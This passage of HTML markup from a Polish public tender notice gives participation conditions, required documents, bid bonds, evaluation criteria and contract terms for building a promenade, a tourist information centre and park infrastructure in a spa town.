<br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-06</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę równą co najmniej: Część 1 - Budowa traktu turystyczno-spacerowego w dzielnicy uzdrowiskowejSuma gwarancyjna - 5 000 000,00 złCzęść 2 - Budowa Centrum Informacji TurystycznejSuma gwarancyjna - 120 000,00 złCzęść 3 - Uzupełnienie infrastruktury w zabytkowym Parku ZdrojowymSuma gwarancyjna - 250 000,00 złUwaga: Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia, wymagana wartość ubezpieczenia musi odpowiadać sumie wartości ubezpieczenia wymaganej dla tych części.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do kierowania robotami budowlanymi w specjalnościach: a.	Część 1 - Budowa traktu turystyczno-spacerowego w dzielnicy uzdrowiskowej: Kierownik budowy posiadający uprawnienia w branży konstrukcyjno-budowlanej do kierowania robotami budowlanymi, Kierownik robót posiadający uprawnienia do kierowania robotami w branży Instalacyjnej w zakresie prac wodociągowych i kanalizacji, Kierownik robót posiadający uprawnienia do kierowania robotami w branży Instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, Kierownik robót posiadający uprawnienia do kierowania robotami w specjalności drogowejb.	Część 2 - Budowa Centrum Informacji Turystycznej: Kierownik budowy posiadający uprawnienia w branży konstrukcyjno-budowlanej do kierowania robotami budowlanymi, Kierownik robót posiadający uprawnienia do kierowania robotami w branży Instalacyjnej w zakresie prac wodociągowych i kanalizacji, Kierownik robót posiadający uprawnienia do kierowania robotami w branży Instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,c.	Część 3 - Uzupełnienie infrastruktury w zabytkowym Parku Zdrojowym: Kierownik budowy posiadający uprawnienia w branży konstrukcyjno-budowlanej do kierowania robotami budowlanymi oraz Uprawnienia, o których mowa w art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (dz. U. z 2014 r. poz. 1446 z późn. zm.)Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2016 poz. 290 ze zm.) lub odpowiadające im uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub uznane przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2016.65).b) posiada niezbędną wiedzę i doświadczenie:Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego oraz prawidłowo ukończył, co najmniej dwie roboty budowlane polegające na:Część 1 - Budowa traktu turystyczno-spacerowego w dzielnicy uzdrowiskowej: Roboty budowlane polegające na budowie/przebudowie/rozbudowie w zakres których wchodziły w szczególności roboty polegające na: - układaniu kostki brukowej, granitowej oraz płyt granitowych- budowie/przebudowie/rozbudowie obiektów małej architektury- budowie/przebudowie/rozbudowie oświetlenia ulicznego lub parkowego- budowie/przebudowie/rozbudowie fontanny posadzkowej- budowie/przebudowie/rozbudowie sieci i przyłączy wodociągowych i kanalizacyjnycho wartości co najmniej 4 000 000,00 zł brutto każda. Zamawiający przez zamówienie rozumie jedną umowę.Wykonawca musi wykazać, że roboty zostały wykonane w sposób należyty oraz zgodny z zasadami sztuki budowlanej i prawidłowo ukończone.Część 2 - Budowa Centrum Informacji Turystycznej: Budowie, rozbudowie lub przebudowie budynków użyteczności publicznej (w rozumieniu rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. z 2015 r. poz. 1422) lub budynków wielorodzinnych o wartości co najmniej 120 000,00 brutto każda. Zamawiający przez zamówienie rozumie jedną umowę.Wykonawca musi wykazać, że roboty zostały wykonane w sposób należyty oraz zgodny z zasadami sztuki budowlanej i prawidłowo ukończone.Część 3 - Uzupełnienie infrastruktury w zabytkowym Parku ZdrojowymBudowie, rozbudowie lub przebudowie obiektów małej architektury, oraz nawierzchni bezpiecznych na placach zabaw lub boiskach sportowych lub innych o wartości co najmniej 200 000,00 zł brutto każda. Wykonawca musi wykazać, że roboty zostały wykonane w sposób należyty oraz zgodny z zasadami sztuki budowlanej i prawidłowo ukończone.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający żąda:o	dostarczenia odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy Pzp.,</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">6)	W celu potwierdzenia przez Wykonawcę spełnienia warunków udziału w postępowaniu Zamawiający może żądać dostarczenia następujących dokumentów:a)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. b)	wykazu wykonanych robót budowlanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty;c)	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">DOKUMENTY I OŚWIADCZENIA WYMAGANE OD WSZYSTKICH WYKONAWCÓW, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:1)	Oświadczenia Wykonawcy:a)	o nie podleganiu wykluczeniu z postępowania,b)	o spełnianiu warunków udziału w postępowaniu,2)	Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem.a)	W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy.b)	W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp).3)	Zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia.4)	Dowód wniesienia wadium.5)	Kosztorys ofertowy.Obligatoryjnym elementem oferty jest szczegółowy Kosztorys ofertowy - jest niezbędnym dokumentem umożlwiającym zamawiającemu zweryfikowanie czy oferowany przedmiot jest poprawny, zgodny z opisem przedmiotu zamówienia i prawidłowo wyceniony. Ponadto opisany w kosztorysie sposób i zakres wyceny poszczególnych prac pozwoli zamawiającemu wstępnie ocenić ofertę także pod kątem ewentualnego wystąpienia ceny rażąco niskiejJeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a)	nie otwarto likwidacji ani nie ogłoszono upadłości.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający wymaga wniesienia wadium w wysokości: Część 1 - Budowa traktu turystyczno-spacerowego w dzielnicy uzdrowiskowej - 150 000,00 zł ( słownie: sto pięćdziesiąt tysięcy złotych)Część 2 - Budowa Centrum Informacji Turystycznej - 3 000,00 zł (słownie: trzy tysiące złotych)Część 3 - Uzupełnienie infrastruktury w zabytkowym Parku Zdrojowym - 6 000,00 zł (słownie: sześć tysięcy złotych)</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Przedłużenie okresu gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">1.	Wykonawca udzieli na przedmiot zamówienia gwarancji i rękojmi na okres określony w ofercie, jednakże nie mniej niż 60 miesięcy licząc od daty odbioru końcowego przedmiotu umowy. Bieg terminu gwarancji i rękojmi rozpoczyna się w dniu następnym po odbiorze końcowym przedmiotu umowy.2.	Istotne postanowienia umowne określa wzór umowy, stanowiący załącznik do SIWZ.3.	Warunki dokonania zmian umowy określono w załączonym do SIWZ wzorze umowy.4.	Możliwość dokonania zmian umowy stanowi uprawnienie Zamawiającego, a nie jego obowiązek.5.	Wynagrodzenie płatne będzie w terminie 21 dni od dnia otrzymania faktury wraz z kompletem niezbędnych dokumentów z zastosowaniem mechanizmu podzielonej płatności.</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">1.	Wykonawca, którego oferta została wybrana, zobowiązany jest do wniesienia przed zawarciem umowy zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny całkowitej (brutto) podanej w ofercie. 2.	Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. 3.	Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach w: a)	pieniądzu; b)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; c)	gwarancjach bankowych; d)	gwarancjach ubezpieczeniowych; e)	poręczeniach, o których mowa w 